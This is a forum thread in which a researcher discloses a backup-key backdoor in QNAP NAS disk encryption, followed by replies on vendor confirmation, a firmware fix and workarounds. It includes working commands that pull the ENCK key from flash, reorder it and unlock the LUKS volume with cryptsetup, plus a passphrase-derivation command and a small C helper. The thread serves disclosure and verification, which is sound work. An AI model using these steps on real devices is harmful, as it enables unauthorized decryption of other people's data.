Backdoor in the Disk Encryption Feature (verified)

[marcmarc]

I found a medium security vulnerability in the disk encryption functionality over a month ago (the key file to unlock was written to a /tmp/ file, and then just deleted, so I could be recovered) and got feedback from the Qnap tech team that this issue was fixed in the last firmware update (3.1.1 Build 0815T)

So I reviewed the implementation to ensure that now the temporary key file is properly overwritten before deletion - and yes, it is done.

However, in that process I found a backdoor, which is so blatantly obvious that I overlooked it the first time, and I just thought this is how things work with LUKS - which I never used before.
So I really have to appologize here, that me as a security professionel, that I oversaw this gaping hole.

The backdoor is like this: beside the key the user is using, a backup key is generated and written to the flash. So anybody who gets access to the flash (local admin rights on QNAP shell), can read out the backup key and access the encrypted harddisk without a passphrase!

And everyone who is using the disk encryption option can verify this for themselves:

this requires perl for the string manipulation. if not installed because of squeezecenter (/share/MD0_DATA/SSODS/bin/perl) and not installed wia OptPkg, do this on a different machine - or do the reorder by hand (see below)

Code: Select all

[/] # strings /dev/sdx6 | grep ENCK | awk -F= '{print$2}' | perl -e '$in=<STDIN>;$tmp1=substr($in,0,24);$tmp2=reverse(substr($in,24,8));print $tmp2 . $tmp1;' > /tmp/testkey
[/] # /sbin/cryptsetup luksOpen /dev/md0 md0 --key-file=/tmp/testkey
key slot 0 unlocked.
Command successful.

Explanation:
The backdoor key is in the ENCK variable in the flash device ("grep ENCK /dev/sdx6"). A simple string manipulation has to be performed so it is valid as a key:
Key in ENCK : ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
After reorder: 543210ZYABCDEFGHIJKLMNOPRQSTUVWX
This reordered key has to be written to a temporary file WITHOUT A LINEFEED.
thats all that is to it ...


just for completeness, this is how it works with your passphrase in case you want to access the harddrive on a different linux machine:

Code: Select all

#[b]this requires a crypt command which supports md5. its not installed on qnap, so do this on a linux system where this is available
[/] # crypt '$1$YCCaQNAP$' 'yourpassphrase' | tr -d '\n' > /tmp/testkey
[/] # /sbin/cryptsetup luksOpen /dev/md0 md0 --key-file=/tmp/testkey
key slot 1 unlocked.
Command successful.

the "tr -d '\n'" removes the linefeed from the output

in case you dont have the crypt command on your linux, compile this yourself:

Code: Select all

// compile with "gcc -o crypt crypt.c -lcrypt
#include <stdio.h>
#define _XOPEN_SOURCE
#include <unistd.h>

int main(int argc, char *argv[]) {
  char buf[256], *result;
  strcpy(buf, argv[2]);
  result = crypt(buf, argv[1]);
  printf("%s\n", result);
  return 0;
}

So lets hope they remove this backdoor asap from their firmware image!
In the meantime you have to overwrite the saved ENCK key with a random string.

[marcmarc]

Some updates:

I could verify this with one more user that the backdoor also exist on his device, and with another user that he has two keyslots and the ENCK key is present in the flash.

grep ENCK /dev/sdx6 - does not always find the ENCK key.
strings /dev/sdx6 | grep ENCK - is more reliable. I edited the intial post to reflect that.

To check if the backdoor is also active in your installation, two things have to be in effect: the ENCK key has to be present in the flash, and two keyslots have to exist.
Execute the following command: "/sbin/cryptsetup luksDump /dev/md0".
If Keyslots 0 and 1 are enabled, the backdoor is active.

When analysing the binary code paths, I could see that depending on some values, the bytes of the ENCK keys are shuffled as described above, and on some they are not. So if the ENCK key is not working in the described shuffled format, try again with the ENCK value like it is.

For informational purpose: below is a screen dump of the disassembly of the function Get_Key_File, which extracts the backup key from the flash.

Please more people report if it works for them. thanks.

[Jeroen1000]

I can hardly believe that there are so few replies to this topic?

Thanks MarcMarc, I have received your message but I do not have a Qnap device because of a similar reason: the implementation is closed source and I simply do not buy into that. Thanks to your research I now know for sure I won't be buying this NAS. Just imagine the possible consequences if you thought your precious data was safe.
I'm very much interested in a official response from Qnap!

Perhaps you should contact a few posters from an earlier topic regarding this issue? They will surely be able and willing to help you.

[marcmarc]

Qnap confirmed the issue and is working on a firmware update which should remove the backdoor.

I will verify that it does that.

I released a public advisory on the issue, to force Qnap to properly inform the users on the importance of the coming firmware update and explaint themselves to its customers why the backdoor was present.

http://baseline-security.de/downloads/B ... 9-3200.txt

[Korrel]

Very useful information! This especially implies, that the internal saved key in the ENCK variable is not a modification of the user entered key but a second key.

I corrected my post ( http://forum.qnap.com/viewtopic.php?f=1 ... t=0#p81150 ) accordingly.

['napper]

Still nothing from QNAP about this issue?

[marcmarc]

There is a beta firmware update (v3.1.2 Build1001) out since begin of October which has the following entry:

[Enhancement]
- Provide Enhanced AES-256 encryption in data security

which I assume is the removal of the backdoor. But I have not checked it as Qnap did not get back to me telling me its fixed, also they promised.
I will check the next stable firmware update and see if and how the backdoor is removed.

Again, Qnap has nothing learned, removing a security vulnerability or even a backdoor has to be labeled as such, and not weaseled around as "enhancement".

[Korrel]

Workaround:

There is no workaround available which can be used by a novice
user.

I didn't try, but a possible workaround for novice user could be the following:

1) put an equivalent set of new harddrives in the device and remove the current ones.
2) set up encryption with the same user passphrase as before (a different backup key should be generated)
3) put in the old harddrives again.

of course the unsecure keyslot 0 of LUKS remains, but at least the stored key does not match anymore.

[marcmarc]

I didn't try, but a possible workaround for novice user could be the following:

not sure if this works as the flash contains three reserved places for backdoor keys.

the easiest would be just to edit the flash with a hexeditor and overwrite the saved key.
the key would be still valid, but is not known anymore. however, the key is not generated cryptographically secure, so it still can be cracked, howver this needs quite some time and effort.

[marcmarc]

I quickly checked the stable firmware v3.1.2 Build1014.
It does remove the backdoor from the crypto volume and from the flash.

However, the offending code is still in the binary. I currently have no time to check if they just put something like "if (1 == 0) ..." before the backdoor code to jump around it, or if they added a new backdoor, or whatever they did.

And what is totally not OK is labeling this issue as "Provide Enhanced AES-256 encryption in data security" in the change description.

[kanuut]

I was searching this forum for information about the aes encryption functionality of the QNAP TS-239 Pro. Thanks to marcmarc i found this thread indicating this encryption is everything else but reliable. I can not understand why nobody officially addresses this huge security breach. By the way QNAP is handling this problem my confidence in their encryption implementation is not exactly strengthened. On the contrary, marcmarcs discovery contradicts QNAPs statement in this forum that there was no such backdoor (http://forum.qnap.com/viewtopic.php?f=1 ... =10#p63341 also see http://forum.qnap.com/viewtopic.php?f=11&t=11214).
That forces me to wait for the Fujitsu Celvin NAS; perhaps they do a better job in implementing aes disk encryption.

[QNAPJason]

Hi soopersonic,
Yes, it's been fixed.

[Korrel]

I think for LUKS its not used directly the entered key in the web UI.

marcmarc explained it before, that a "salt" is used:

#this requires a crypt command which supports md5. its not installed on qnap, so do this on a linux system where this is available
[/] # crypt '$1$YCCaQNAP$' 'yourpassphrase' | tr -d '\n' > /tmp/testkey
[/] # /sbin/cryptsetup luksOpen /dev/md0 md0 --key-file=/tmp/testkey
key slot 1 unlocked.
Command successful.

[will.bohannan]

Is QNAP going to make it possible for the key to be accessed via USB thumb drive?